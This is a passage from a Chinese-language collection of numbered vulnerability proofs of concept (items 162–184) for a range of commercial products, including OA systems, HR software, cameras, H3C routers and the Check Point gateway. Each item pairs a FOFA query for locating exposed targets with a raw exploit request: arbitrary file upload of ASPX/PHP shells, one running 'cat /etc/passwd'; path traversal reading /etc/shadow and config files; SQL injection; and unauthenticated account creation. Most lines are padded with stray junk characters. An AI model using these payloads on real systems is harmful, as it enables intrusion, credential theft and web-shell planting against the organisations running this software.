xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
) D i/ p$ n1 H6 U<soap:Body>; a* R5 q1 p6 f+ @+ ^+ c
<UploadResume xmlns="http://tempuri.org/">
' F( ^8 R/ Q4 [- [2 J<ip>1</ip>1 { }+ f; R* e8 u8 E& E9 Y# U
<fileName>../../../../dizxdell.aspx</fileName> k7 C- r3 I5 S0 |( f( O6 l
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
- X) j, J5 p$ h" C ]% Y5 U" T<tag>3</tag>
. o: k' x8 A2 a( |- B8 f) u \# r+ m</UploadResume>+ L; i% ^$ B. A9 o/ C1 {
</soap:Body>$ } U' b5 l: B% q) n$ y
</soap:Envelope>( e @" P7 t& G( l
' i# R2 V% ~" E
$ z' c% k4 k" p3 U6 b ^: k" shttp://x.x.x.x/dizxdell.aspx
; {- y) C( V( y& _' J- n v
& {4 B7 d) i% R9 ?162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
0 E9 ]% e* x5 V [9 ^7 ~FOFA: app="和丰山海-数字标牌"
3 z* m. D3 i( o# d; F' VPOST /QH.aspx HTTP/1.1( L$ w0 E) y& R, x' u
Host: x.x.x.x
1 K+ Z) q7 a0 C+ CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
! o" k0 m. J; B, T, `0 D. D# uConnection: close+ K) `" p* |7 x% e5 I( D0 W: U
Content-Length: 5832 G E1 r' _3 O* R
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey8 ]4 Y% z t% c" k& y- N
Accept-Encoding: gzip
: t9 W6 _9 Z6 F
, B$ r, o* H& I7 N; @------WebKitFormBoundaryeegvclmyurlotuey
- n) i2 O; _* A; K+ [8 y2 {: ~1 {Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"# ^* y& E# T5 B8 T
Content-Type: application/octet-stream$ ?5 u. C% `, c- t/ {
* ?6 a! \/ x9 ?7 F3 B1 l8 V
<% response.write("ujidwqfuuqjalgkvrpqy") %>
' }' V) y' p# c0 d5 m------WebKitFormBoundaryeegvclmyurlotuey8 a+ Q7 h8 |3 _
Content-Disposition: form-data; name="action"8 x: Q! b1 Q, a# r4 i0 f
, \2 V7 D8 _( H
upload
9 q! e' \# _( G5 U------WebKitFormBoundaryeegvclmyurlotuey
) O8 W; G5 X3 W8 b$ u/ E" FContent-Disposition: form-data; name="responderId"
, X7 c. |( ~3 N4 A* B5 F' p' J% G5 T; n3 g% S7 b! J6 R! S+ F
ResourceNewResponder
" e& A) }* h; a. z4 t* `% L2 x------WebKitFormBoundaryeegvclmyurlotuey- ]: _- X& V# c# X
Content-Disposition: form-data; name="remotePath"* V% E; u6 v% ?# n
# L1 _3 [2 H+ H, L" v/opt/resources5 _3 G6 N6 d( Z. T
------WebKitFormBoundaryeegvclmyurlotuey--
! f, W) I& c* h, C0 l% d# D) H6 f! r# A3 P
; z9 P. C6 D, v1 H* o. d7 K! C4 Z
http://x.x.x.x/opt/resources/kjuhitjgk.aspx- m( I5 S/ \9 u; D# B( w
* G% s! ?. ~5 @* B/ h/ }
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传1 H% ^! f z- L8 z% z
FOFA: icon_hash="-795291075"
/ t7 m: D& y3 Z) W+ {; H$ nPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
2 T! ]% Z# q$ V* _5 i+ sHost: x.x.x.x
# d( E4 K6 m; ^# y8 R+ _. s4 c, SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.368 e6 t# N2 M1 V- y0 a ~
Connection: close
8 f6 a; N" G; U* A& ~; T* EContent-Length: 2930 b4 U$ x: G" S9 q& ]
Accept: */*
1 s6 U$ H( \$ vAccept-Encoding: gzip, deflate) @+ {3 _" y/ H3 s4 U2 ~
Accept-Language: zh-CN,zh;q=0.96 h$ ^5 S! f; M8 o. M& M8 K/ t X, B* D
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
" }- H( \8 H- s" D& ~% S" B6 |+ B' ^1 E/ f+ X& Z" Y
------iiqvnofupvhdyrcoqyuujyetjvqgocod
9 d8 i- `8 F. l7 p+ }( w ZContent-Disposition: form-data; name="name"
% b4 x( f$ p/ t
' i( ^& U! X+ y1.php
7 [5 t1 S! j, g6 m------iiqvnofupvhdyrcoqyuujyetjvqgocod
& _" I& m* K0 |Content-Disposition: form-data; name="upfile"; filename="1.php"
0 g( [0 p+ l; o# L+ |Content-Type: image/jpeg
6 @$ _/ Y0 d; u5 F
+ V1 [5 p: @: h+ Arvjhvbhwwuooyiioxega0 R) g/ D. q/ ^" P7 e# r6 R
------iiqvnofupvhdyrcoqyuujyetjvqgocod--* T4 \1 H# A% y7 q4 @' Y. E$ l
; f5 m1 l+ E b% Q' G
7 {4 N, `( x. Y. u/ e, [- x8 W164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传3 m! ^; |* B! ^ W0 x
FOFA: title="智慧综合管理平台登入"
4 z, ?, T, V6 w9 {# } t6 B1 a) ~POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
. ^9 P4 M$ r$ ^* @Host: x.x.x.x# m2 Z& t6 Q0 N; H5 O4 z' n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0; J: p f" x$ ^( X0 M% o6 g
Content-Length: 2884 h% T! y9 ?# ]9 z- X: z. _, j4 G: u1 f
Accept: application/json, text/javascript, */*; q=0.01% x5 p6 e- C3 s0 u3 Z" X1 w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
' b3 _- Y5 c: i# i4 gConnection: close% u/ p: M' a4 z' Y. b/ [
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl$ i% p) h5 m; E% z( Q
X-Requested-With: XMLHttpRequest
5 _1 P- U/ O* i) cAccept-Encoding: gzip Y: `$ g9 W5 [1 t$ T
2 _/ I c/ L0 Y8 x% Z5 l7 R6 q
------dqdaieopnozbkapjacdbdthlvtlyl7 I5 n7 E0 B/ T4 ]3 T- D. h& P
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
7 L: S; `1 t8 {Content-Type: image/jpeg
- x4 t/ |' N; V* f
" i, V9 l" }' t# |: |3 o<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
7 ^1 D* K+ H2 I" u/ E2 r------dqdaieopnozbkapjacdbdthlvtlyl--, v) g: p% r5 O9 S' V5 L! v
9 u8 O& u, t5 Y9 O- `* ^
/ B1 }; ~2 b( L; t: @$ r, Vhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
6 x+ u& A" d/ V" Z5 { B; g+ H
/ Q# g* r6 k, e: f, ]9 `8 W( X165. OrangeHRM 3.3.3 SQL 注入3 D) A5 O1 j$ X+ d2 t( q3 H$ j' a
CVE-2024-36428
. g& v! h, Y& e, M, BFOFA: app="OrangeHRM-产品"
3 B/ j8 z. O; o6 `. XURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))+ j" M* A7 z/ K: ?! t* ], ]6 G
- V# h; \# m4 j# t
o. q) d) [( ~! b: E3 I0 k166. 中成科信票务管理平台SeatMapHandler SQL注入
6 ^% F: l; G; E+ u1 UFOFA:body="技术支持:北京中成科信科技发展有限公司"
/ j5 [" C3 `/ o$ \# dPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1' a3 l4 d1 L1 u* M# s' A: P3 h p
Host:
{4 n: |) Y# B3 a6 ~/ c7 oPragma: no-cache6 W# p( W8 z" y
Cache-Control: no-cache
. B" g( h6 K$ _8 [( ZUpgrade-Insecure-Requests: 1
, v) j, }8 ]% aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36( a: S H/ _7 r( I* h8 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! \. Y/ X9 L& q! TAccept-Encoding: gzip, deflate8 ?' J' I ~( ]/ ^$ ]. V/ }
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
. q1 I! r: ]& w5 w0 y- ?Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE9 c1 h2 P; T) J
Connection: close
, q* x9 V: R+ }( bContent-Type: application/x-www-form-urlencoded) n, X6 C- j1 Y: t/ E. c1 X
Content-Length: 896 [& K1 I/ Y3 h( z) H
; y9 E; f7 m- {4 T' JMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE: u$ \% F9 @: i! z$ B0 r
9 o; j2 Y+ L& J$ I/ C: i9 }, |& f$ R7 y4 v( N3 S4 M
167. 精益价值管理系统 DownLoad.aspx任意文件读取, q c% |; ]: k. w
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
) T9 I" Y; a5 T4 P7 E- iGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1! F' O+ o d# g6 L& p7 ~( b9 w
Host:) b1 q; m" V& ^- x# i B) P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( N7 J. n7 C# u. Z% \: J8 ~
Content-Type: application/x-www-form-urlencoded
& A4 m1 i" d: G3 f# MAccept-Encoding: gzip, deflate
. P' b! m. `. T* Y- E% a0 p4 yAccept: */*! L: I3 _ Z5 Y; c+ Z
Connection: keep-alive: c7 Z: a" E6 V1 R, ^
& Q; i. \0 e6 r) M' I ^
% p3 V `9 y3 L" Y6 b168. 宏景EHR OutputCode 任意文件读取
[: H4 j' ^ i0 uFOFA:app="HJSOFT-HCM"+ Q% m: x1 P4 d1 ^4 n! [7 ~
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1+ @6 e; U" p4 o8 j9 `
Host: your-ip
9 D& L& h2 b# b7 g5 `& r0 G! ]9 C8 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
o8 j+ w: w/ ?; L1 H3 gContent-Type: application/x-www-form-urlencoded
! N& g7 m/ O2 d! i; H, ^Connection: close
) I% L+ ~4 d$ K
+ V) X4 P$ @1 d0 q. x
' {) ^3 R. B: P6 d# {3 l# J$ i9 j9 N; J
169. 宏景EHR downlawbase SQL注入) {: j- x7 ^! E/ Y$ C( t, h8 b
FOFA:app="HJSOFT-HCM"
) |' Q6 \. l( QGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.12 v: z, g+ g% p6 G
Host: your-ip
! w( L3 a0 |0 U* s4 t7 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ o* O/ l4 J* F. s; @$ T( j3 aAccept: */*
& I) V+ v4 r- K% D) K7 v g6 s8 O3 QAccept-Encoding: gzip, deflate
' ~5 _/ p9 a" k" h4 zConnection: close
6 c( w3 c! m7 I4 S; @
* x5 E" G' _( r8 m: D `% X* e
" C# A; G- G8 y1 V2 Q/ ]# w( \0 n$ z8 K0 M4 w# M
170. 宏景EHR DisplayExcelCustomReport 任意文件读取: f" @" r, ^! n4 V
FOFA:body="/general/sys/hjaxmanage.js" I# D# [& @+ _" X( ? I
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1* Y# s' x. u3 I& d5 c
Host: balalanengliang
( q" o2 x: @$ C1 gUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ r+ I1 ]3 ^' C" k; z; x8 rContent-Type: application/x-www-form-urlencoded
7 y; C8 @/ o( b7 [& l% |, [8 q
! S3 M+ o# R) L5 [ E, y: O- Yfilename=../webapps/ROOT/WEB-INF/web.xml
7 T6 I9 V; u+ _ K8 M! E" y$ G
# ^% }4 o- _+ A8 m) Y- ]/ }
, L# m6 F( g/ S+ i: X2 k4 E171. 通天星CMSV6车载定位监控平台 SQL注入7 X- w! d+ [5 E2 u0 M* j7 B
FOFA:body="/808gps/"$ s a" D! B" Z- X$ n
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.11 z6 w8 q# r) N: x _+ g
Host: your-ip ]9 m' ?8 r& G2 W3 p/ F" _) u+ n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
6 R3 Z% `) K3 N8 Q5 D1 a! N/ YAccept: */*
( e. S' `: q* J# M1 L( c# vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) Z$ s" v0 u Y
Accept-Encoding: gzip, deflate) h% ^& _ V( q4 @5 F, r+ L
Connection: close
/ Y" ?, W8 O0 s, x
4 S- {1 s3 e; T% m; {! t. i7 K( C e; ^; H
+ X8 }* y U. v1 O0 M
172. DT-高清车牌识别摄像机任意文件读取# l* ?. _' U& X k
FOFA:app="DT-高清车牌识别摄像机"
8 j* J/ v% P( GGET /../../../../etc/passwd HTTP/1.1 l: f& K7 T9 a
Host: your-ip
7 J# c3 T" y( R# f2 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& Z+ {3 r" w! U5 U0 }% R( P
Accept-Encoding: gzip, deflate9 a# M6 U0 _7 T6 F% t- [" J
Accept: */*" h" \0 f$ n5 z1 {' R2 }9 T
Connection: keep-alive, T% M- \2 c+ f/ z) d1 `, U
; [4 w4 p/ V" x: d: V) x. W8 L5 H# t" U- S) E) t5 w' a
% \# j0 L' [( { o& A x4 v
173. Check Point 安全网关任意文件读取: b+ u+ R T1 H4 c) a) u' _
CVE-2024-24919
5 E8 }& Z) k0 W0 TFOFA:app="Check_Point-SSL-Network-Extender"
3 K R% N3 Z9 x0 `( G8 ?5 |) vPOST /clients/MyCRL HTTP/1.1# f. ^2 A1 B! `" i7 g0 A* G$ x
Host: your-ip1 C: d8 O2 |( \) h- T
Content-Type: application/x-www-form-urlencoded
+ l5 ~, z4 M% s2 N' ?. _* Q9 s7 }& _9 s+ ^* D5 o3 K
aCSHELL/../../../../../../../etc/shadow" r) p% K, M6 `0 P5 O, N$ d
) F6 D8 V5 u3 X+ C& B1 o4 A$ {" J1 P! @
! A! E" }- a1 P+ D" D) U
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
9 r: u9 L0 E, E6 w6 [% YFOFA:app="金和网络-金和OA"
. r, N, U V( n: ?! S5 b6 q, t# `+ o0 NGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.18 T2 o" L. B, ~ w% Q7 Z+ {9 Y0 o3 s9 a
Host: your-ip
# D# E0 Z- e1 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" [5 s# _& e3 X& x$ @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 }3 x* S0 g! p# N' f
Accept-Encoding: gzip, deflate, br
+ C+ n/ e/ M2 E3 D, D( r; r- oAccept-Language: zh-CN,zh;q=0.9
5 s# j8 V9 O& ]- ?& p& b6 L4 _Connection: close
* N: r8 e7 G9 I+ p( j1 M2 y v! A9 f* M/ q' c \/ Z1 f
6 A3 Q/ L- Y: h
! _( Y# O b: C4 K# r) m) H; E
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入. _" B% t' i6 T) O( ~! i
FOFA:app="金和网络-金和OA"
6 w/ U0 r' K5 O5 Q' E+ HGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
8 P i% m- n% M eHost:* U) \% N0 y( g ~6 ]2 e
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' h/ X U4 o7 n8 k X3 O6 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, X+ W9 F3 I/ c( C: T( e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: O3 Q) ~6 p M" M
Accept-Encoding: gzip, deflate
1 m. Z8 ?1 Z9 J: Q1 cConnection: close
1 n% a1 Q: X ^! i: VUpgrade-Insecure-Requests: 1
; j" g0 B2 K3 _8 h u s# _0 D, w4 p. J; e5 Y4 P9 j) _/ f% _
% h- j& C. l5 |: z P7 h {; v176. 电信网关配置管理系统 rewrite.php 文件上传! B1 L* W+ g7 y9 s$ Y {
FOFA:body="img/login_bg3.png" && body="系统登录"2 T: V" ^1 q/ V
POST /manager/teletext/material/rewrite.php HTTP/1.13 c# \& O- Q( ~8 H
Host: your-ip
7 {# s. o h+ Z) bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.09 [" ?- K2 {! J" ~) o! N7 f
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
: R# N9 z9 |9 I9 A. T1 wConnection: close: ?4 w: ^. j% l/ w( S7 W
* I2 S! r6 G8 p
------WebKitFormBoundaryOKldnDPT
7 U$ Z# H) h; W8 oContent-Disposition: form-data; name="tmp_name"; filename="test.php"3 [$ Y6 L! p4 r( \$ f0 r: y
Content-Type: image/png$ I4 @& N. s( G$ l6 c* X# U* \) f
/ F f" }( y$ l<?php system("cat /etc/passwd");unlink(__FILE__);?>
* K% T( R! W& v3 [* q& b3 W------WebKitFormBoundaryOKldnDPT
+ s+ _ ^/ y& n, z- P: D2 S; }Content-Disposition: form-data; name="uploadtime"
; M- V8 W2 r p; U( x% i& I
6 y& }& \/ }# j! l( L7 g, V" a5 { 8 d7 Y2 ]$ d7 B# D3 g) l. a. ^
------WebKitFormBoundaryOKldnDPT--
8 N/ ~4 R; y- S3 ]: Y! w7 {2 I( L, c( [1 \* |8 N$ J& k( x
" z& \9 S0 L6 n/ d. b) O4 E. N
4 ]6 `- J9 c r; i
177. H3C路由器敏感信息泄露7 C/ T& d- \% i# R9 T8 Y) M* L4 {
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
: h) S% E5 G5 G' ~9 f7 \& M. J4 i/userLogin.asp/../actionpolicy_status/../M60.cfg1 f. N. j6 r& }; Z% D5 q4 t
/userLogin.asp/../actionpolicy_status/../GR8300.cfg l9 R& N% c2 ?+ A' J P
/userLogin.asp/../actionpolicy_status/../GR5200.cfg6 ~. j& X+ n9 ~ ]% @- y
/userLogin.asp/../actionpolicy_status/../GR3200.cfg- {& H: L, Z# P" k+ i' N
/userLogin.asp/../actionpolicy_status/../GR2200.cfg6 x; y- y4 \- B1 K, L
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
' Z0 U. A3 j6 @; e8 `; |/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
# U- _- r; t2 a3 ~0 k7 [; ]/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg! k: e# ?' z1 Z4 e( r5 [; ]
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
% E$ Y% N% X/ o2 N6 L0 x/userLogin.asp/../actionpolicy_status/../ER5200.cfg: Q$ ^! N! e" l( D
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
M l1 M7 {2 D4 h6 H/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg& `9 }' U$ Q/ q% j
/userLogin.asp/../actionpolicy_status/../ER3260.cfg9 G/ M9 ~3 K+ l$ W- Y) V7 x5 ~
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
4 a3 D2 d. d* k- S Y5 i3 S/userLogin.asp/../actionpolicy_status/../ER3200.cfg
7 U* V& {$ l6 }! |1 \8 r& h3 F/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
* z+ W; p* H0 ?, {/userLogin.asp/../actionpolicy_status/../ER3108G.cfg/ M) o4 @% d5 y& S0 i
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
. D& T& `+ m/ n" \ k: c/userLogin.asp/../actionpolicy_status/../ER3100.cfg
* x3 k2 b$ W: E# v/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
G( H7 M4 C' w$ K6 I2 L2 ^5 U2 S% |( O
3 ]6 @+ H4 u2 j) ]% T' F2 a7 d
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
2 G7 h, J) L7 l1 H( NFOFA:header="/selfservice"
* I# n' T8 `& _1 j7 a. M7 f2 ePOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
, z( h: ]# \' D i7 nHost:) @5 T9 f4 }4 M8 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 l! D) _, d! v
Content-Length: 252
0 ]" L; R( p6 E( z+ ]Accept-Encoding: gzip, deflate6 }: u& b/ w! ^( ^- ]6 a$ n* h' K
Connection: close( V( R9 f9 }$ y! p% A( W7 ^
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l# m6 n6 ?# g6 J
-----------------aqutkea7vvanpqy3rh2l1 h5 o9 w& P5 W& l4 {
Content-Disposition: form-data; name="12234.txt"; filename="12234"6 }1 Q6 J' g; |% K) i4 a
Content-Type: application/octet-stream4 w/ F4 W; u: d# |
Content-Length: 255
: b0 M _6 o. o X" v. f* A9 n( k# w
" B- q- T- J7 B. [4 f2 {7 E4 |12234
! V$ \ f' t( O; B-----------------aqutkea7vvanpqy3rh2l--# V3 h1 j# Z/ [ s( H* h- C1 S( C M
$ S' a" A6 S2 z5 o) V, J+ v& q$ j6 F8 S- H# Z6 l' P7 Z5 G
GET /imc/primepush/%2e%2e/flex/12234.txt
6 h9 x, @8 P2 G" \ s# `/ B/ `+ d- o) l1 b, b" |5 R: L" U1 d
% c) Y: k/ G9 Z7 n' C4 D+ a) x
179. 建文工程管理系统存在任意文件读取
2 `2 }+ p/ E, \9 ]" |/ x2 YPOST /Common/DownLoad2.aspx HTTP/1.1
2 I) x n$ N' \Host: {{Hostname}}9 q1 A5 a* `# a3 M% x
Content-Type: application/x-www-form-urlencoded+ V' O2 ]% q8 y* D* p
User-Agent: Mozilla/5.0
" d8 }* r, p: S8 b# J
) |! ^& i& x' K. i8 B( y ?$ k1 wpath=../log4net.config&Name=7 S. @7 p4 W3 t2 f$ o; V6 d4 N2 v9 A
! U0 G( Q }) L- S1 w1 Z4 d
. y# Z' \! ]3 Y180. 帮管客 CRM jiliyu SQL注入
1 V5 n4 A% R7 AFOFA:app="帮管客-CRM"; C8 d9 Q: K9 t( _' ~
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
- |3 v- |" Q; J6 \# JHost: your-ip9 e% e/ m7 S2 P# T7 V f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
1 Y9 V$ ^- d0 _# O9 cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ `- v+ I# C! n% b6 zAccept-Encoding: gzip, deflate
# g; ], ~: I# \4 P4 E* ~+ M1 G9 ]Accept-Language: zh-CN,zh;q=0.90 j! \9 l4 L2 H- d& B
Connection: close
1 ~; S, J. F; h2 E; ~2 y# z1 d, t. y! b w1 T& @# A
6 a% \5 Z, C6 T: a- Y7 k181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入7 K9 V$ S8 h4 s# N, u$ D" G* a4 G1 _
FOFA:"PDCA/js/_publicCom.js"
) B- m/ H' ~% Y2 e3 ]POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1$ O6 O1 p! t0 d) a# K) `
Host: your-ip2 ]6 D& W3 g5 z; [5 m7 q- N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
7 b% J. b( W# x- b( c8 VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' u# A. F5 a3 G% T1 p! [% Y0 EAccept-Encoding: gzip, deflate, br
( Q1 I" m6 w8 ]! N$ s0 V( PAccept-Language: zh-CN,zh;q=0.9
9 U; l1 n3 \: \* I9 Q" xConnection: close
3 h: Y- c. z- C- TContent-Type: application/x-www-form-urlencoded2 t u5 r1 G$ O
; g+ B# ?9 _* F% o
! l3 O N: z; l+ Haction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
, C6 T$ N! Y! M$ n/ w
! ^. L: m' F9 o5 P
/ V6 N B' ~! o; A; q1 p# h182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
9 j5 n4 l, l& [1 sFOFA:"PDCA/js/_publicCom.js"
% {: s4 V( \5 BPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
" j! I; N2 n/ d% ^( n/ dHost: your-ip
' P6 H- F" ^: e: l4 ?' kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
6 P0 t' X. [' i9 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* t# X# t" V8 ?" J6 }; ~% i! xAccept-Encoding: gzip, deflate, br' a) v' E1 y$ B" i$ B i, g
Accept-Language: zh-CN,zh;q=0.94 s. _, t+ `8 D/ l5 e7 T
Connection: close0 Z' K3 I0 |/ c) U3 P$ V
Content-Type: application/x-www-form-urlencoded
! R2 D( q% A) E# y* T( n% J* ]7 C, b# \2 e* }: o2 ~* Q
& q! C+ B% s7 Tusername=test1234&pwd=test1234&savedays=1
9 m, n1 W/ _1 J, |8 o
5 k9 p4 ?" |3 w
8 t' F \9 w2 j2 n, O" u( c( r183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
5 X1 _1 x/ ~; H2 ?( k1 ^4 JFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面": D Q) E1 c4 _) l
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
) r" {3 z7 \& R9 _" }" O8 uHost: your-ip
6 g$ E+ Y7 t& \8 K* e' ?5 N. nUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36/ X J4 U2 N; y: G7 _" d! y" ]3 Q
Accept-Charset: utf-8
7 P- @% {( h' z, D; p" IAccept-Encoding: gzip, deflate
9 Z' K! Z- i* y% }' H2 g' fConnection: close
) C# f5 H* [# U( b) I$ f) O2 U5 p6 F( {6 r' G
5 d3 ~" D( g( z- K$ @; F184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
8 p! e- S+ H4 f$ a1 @FOFA:server="SunFull-Webs"8 Y+ T: x/ d, E- b
POST /soap/AddUser HTTP/1.1
+ b k$ L4 h% G5 E0 Z3 gHost: your-ip
( ^* x4 H( H2 ?Accept-Encoding: gzip, deflate
6 d8 f$ o& s3 a( T& bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
' n4 Q; l+ R) {" gAccept: application/xml, text/xml, */*; q=0.013 [# o% q- H# O4 E& v$ k) H
Content-Type: text/xml; charset=utf-8
6 Y) g( k- J/ C" Z$ Z4 t6 QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, f6 v; o1 @3 p- V, k1 rX-Requested-With: XMLHttpRequest
% i0 Y( _( ]; H) n- }6 V" s" n% _5 ` H: |8 I# H
' l; y9 M& D6 o. U
